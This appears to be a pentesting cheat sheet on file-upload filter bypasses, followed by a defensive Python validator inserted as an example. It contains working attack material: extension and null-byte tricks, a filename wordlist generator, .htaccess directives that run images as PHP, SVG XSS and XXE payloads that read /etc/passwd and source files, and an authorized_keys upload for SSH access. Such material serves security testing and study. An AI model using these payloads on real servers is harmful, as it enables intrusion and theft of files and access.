Bypasses
# Client-Side Bypass
Toggle Page Inspector
# Blacklist Bypass
`.phps`, `.phtml`, `.pHp`, `.pHP`, `.php7`, `.phar`, etc.
# PHP extensions
<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst>
# ASP extensions
<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP>
# Web extensions
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
# Whitelist Bypass
## Double extension
`shell.jpg.php`
## Reverse double extension
`shell.php.jpg`
# Character Injection
`%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\\`, `.`, `…`, `:`
```bash
# Generate candidate filenames combining each injected character with each extension
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```
# Content-Type Bypass
## List of All Content Types
<https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt>
```bash
# Keep only the image/* types for use as Content-Type candidates
grep 'image/' web-all-content-types.txt > image-content-types.txt
```
# File Signatures / Magic Bytes
<https://en.wikipedia.org/wiki/List_of_file_signatures>
## .htaccess
```apacheconf
# Make Apache interpret .jpg files in the uploads directory as PHP
AddType application/x-httpd-php .jpg .jpeg .png
# or
AddHandler application/x-httpd-php .jpg .php .phtml
# or
<FilesMatch "\.(jpg|jpeg|png)$">
    SetHandler application/x-httpd-php
</FilesMatch>
```
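A server-side validator that closes the bypasses listed in the sections above (case variants, double extensions, injected characters, a spoofed Content-Type, mismatched magic bytes, and an uploaded .htaccess), added here as an example and not part of the original notes; the allow-list, signatures and sample uploads are constructed for the demo.

```python
import re

# Allow-list: extension -> (expected Content-Type, accepted magic-byte prefixes).
# Constructed for this example. SVG is deliberately absent: it is an XML/script
# container, which is exactly what the XSS and XXE payloads further down rely on.
ALLOWED = {
    "png":  ("image/png",  [b"\x89PNG\r\n\x1a\n"]),
    "jpg":  ("image/jpeg", [b"\xff\xd8\xff"]),
    "jpeg": ("image/jpeg", [b"\xff\xd8\xff"]),
    "gif":  ("image/gif",  [b"GIF87a", b"GIF89a"]),
}

# Exactly one dot, ASCII base name, short alphanumeric extension, matched with
# fullmatch so a trailing newline (%0a) cannot slip past. This one rule rejects
# double extensions (shell.jpg.php, shell.php.jpg), trailing dots, injected
# characters (%00, %20, '/', ':', the unicode ellipsis) and dotfiles (.htaccess).
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def validate_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Every check must pass; anything else fails closed."""
    m = SAFE_NAME.fullmatch(filename)
    if not m:
        return False, "filename must be <name>.<ext> using ASCII letters, digits, '-' or '_'"
    ext = m.group(1).lower()            # pHp, PHP7, pHtml never match the allow-list
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not on the allow-list"
    mime, signatures = ALLOWED[ext]
    # Content-Type is client-controlled: it must agree with the extension, not replace it.
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != mime:
        return False, f"Content-Type {declared!r} does not match .{ext}"
    # The body must carry that type's signature. Polyglots still exist, so uploads
    # also belong outside the web root, served with a fixed Content-Type and nosniff.
    if not any(data.startswith(sig) for sig in signatures):
        return False, "file signature does not match the extension"
    return True, "ok"


def run_demo() -> dict[str, bool]:
    """Constructed sample uploads mirroring the bypass techniques listed above."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16        # minimal constructed PNG prefix
    cases = [
        ("photo.png",         "image/png",  png),                # legitimate upload
        ("shell.jpg.php",     "image/jpeg", png),                # double extension
        ("shell.pHp",         "image/jpeg", png),                # case variation
        ("shell.php\x00.jpg", "image/jpeg", png),                # null-byte injection
        (".htaccess",         "image/png",  b"AddType application/x-httpd-php .png"),
        ("shell.png",         "image/png",  b"<?php echo 1; ?>"), # spoofed Content-Type
    ]
    return {name: validate_upload(name, ctype, body)[0] for name, ctype, body in cases}
```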
## Magic Bytes
# Limited Uploads
## XSS
- HTML, JS, SVG, GIF
## XXE/SSRF
- XML, SVG, PDF, PPT, DOC
# payload 1
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>
```
# payload 2
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```
# payload 3
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```
## DoS
- ZIP, JPG, PNG
# Upload + Directory Traversal

# File Upload Private Key
```console
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in fileup
Your public key has been saved in fileup.pub
...
kali@kali:~$ cat fileup.pub > authorized_keys
```
